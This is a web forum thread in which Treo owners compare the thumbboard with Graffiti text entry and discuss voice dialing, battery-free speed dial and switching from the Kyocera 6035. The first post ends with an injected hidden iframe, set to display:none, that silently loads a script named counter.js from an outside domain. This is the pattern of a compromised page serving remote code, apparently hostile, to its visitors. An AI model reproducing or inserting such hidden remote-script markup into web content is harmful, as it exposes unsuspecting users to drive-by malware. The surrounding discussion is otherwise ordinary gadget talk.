+ Reply to Thread

Robert (and other Treo users)

Now that you have had the Treo for a while. How would you rate the usebililty the thumboard vs. grafitti?

If you were consulted for Kyocera's next 7100 series release, would you recommend grafitti or the thumboard? Or both, if they could make work (size and all)?

t<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Re: Robert (and other Treo users)

Originally posted by terryg
    Now that you have had the Treo for a while. How would you rate the usebililty the thumboard vs. grafitti?

If you were consulted for Kyocera's next 7100 series release, would you recommend grafitti or the thumboard? Or both, if they could make work (size and all)?

t
    The regular dialpad is a nice thing to have.................... but being that I use the Treo a lot as a PDA and to send e-mails, etc............. the thumbboard is indespensible! It almost feels like typing on a keyboard once you get used to it! I would definitely say that the thumbboard is superior to grafitti for data entry. If I didn't care about spelling at all grafitti would've been pretty fast.... but I had too many corrections to make that slowed me down. The only thing I'm having trouble with on the thumbboard is trying to still use WordComplete......... I need to order one of those finger styluses!
    Please visit my picture site: Robert-O-Rama :)

Administrator
    FYI, rob did a hands on review of the cheap-o.. its in general discuaaion i think...

I've had my Treo for about 10 days now, and love it. I know some people have complained about the key spacing on the thumboard, but I haven't found it a problem. I have big hands (the gloves don't fit...honest) and still seem to be able to type fairly accurately. I wouldn't try dialing the phone while driving using the thumboard, though. But the speed dial and soft dialpad work well enough for that. With voice dial, you might not need the keypad at all.

Before I bought, I was most skeptical about the usability of the screen...but it has been bright, colorful, and readable in all but the brightest direct sunlight conditions. I still think the Tungsten-T's 320 x 320 resolution would make it a lot prettier (but only a little more useful).

I'm also a 6035 user that converted to the Treo after reading Robert's review. The keyboard was the main reason I switched. I opted not to wait for the 7135 because no keyboard. I was also leary the 7135 trying to do too many things (SD, MP3, etc.) on a 33 MHz processor. After a couple of weeks on the Treo, I got everything working (Xiino, SMS, Avantgo, Eudora, PCS mail with notify, AIM, HS photo viewer, etc.) painlessly. And contrary to all the soft, warm, and the devilish hard resets I read on the Treo boards, I haven't crashed once (well only once with an old AIM client). The 6035 crashed on me too often. Like Robert, I'm currently happy with my new toy which is cheap o ($250). Once you get used to the thumb-board, it's way faster than graffiti. I haven't even installed RecoEcho. Unlimited Vision is such a big bonus too, and it has never been down since I got it (3 weeks).

Voice Dial

I have been looking at the treo. The question I have is does it do voice dialing like my 6035, with the wakeup feature when plugged in? I don't think I could live without that.

Re: Voice Dial

Originally posted by Meterman
    I have been looking at the treo. The question I have is does it do voice dialing like my 6035, with the wakeup feature when plugged in? I don't think I could live without that.
    The Treo doesn't have any kind of voice dialing. I used to use that most of the time with the 6035. I don't miss it too much, because selecting a speed dial with the jog button is pretty easy on the Treo.
    www.treobits.com
    (News, Internet Radio, Software/Hardware Store, Ringtones, Wallpaper, and more...)

Plus I suppose Sprint Service has that optional $5/month voice dialing service.
    ~'kito
    pdaPhoneHome Moderator

PDA keitai ni naritai

1st Smartphone

I too was leary about the treo's abilities but I am pleasantly surprised. Also what seems more surprizing is that SprintPCS is really making an effort to give out tech support on this thing. If this had analog roam and sd/mmc/sdio support (which I suspect will be in the next iteration) the treo would be perfect. But I am still reserving judgement until I see a 7135 in my hands!

Originally posted by Markito Burrito
    Plus I suppose Sprint Service has that optional $5/month voice dialing service.
    yes! this is a must have option for people with lots of contacts they dial frequently. the voice dial on the 6035 SUCKS! between voice command and speed dial I rarely have to dial a number on the thumbboard.

and I'm sending this from my Treo in bed now

nighty nite!
    Please visit my picture site: Robert-O-Rama :)

voice dial

[QUOTE]Originally posted by Robert K.
    [B]yes! this is a must have option for people with lots of contacts they dial frequently. the voice dial on the 6035 SUCKS! between voice command and speed dial I rarely have to dial a number on the thumbboard.

I live in my car during the day and the ability to just say a word to activate the phone and dial a number is great.also not to have to push any buttons to answer it works great for me.The treo also is only single band and doesn't roam being that Sprint is the only service that works for me out here in the mountains .I guess I will have to wait for the 7135.

Robert, I have never had any problems with the voice dial from the phonebook(don't use sprint voice dial). I have most of the numbers programed in and just saying the name while driving works great for me. I guess when you have to do something all the time you will find the easy way to do it.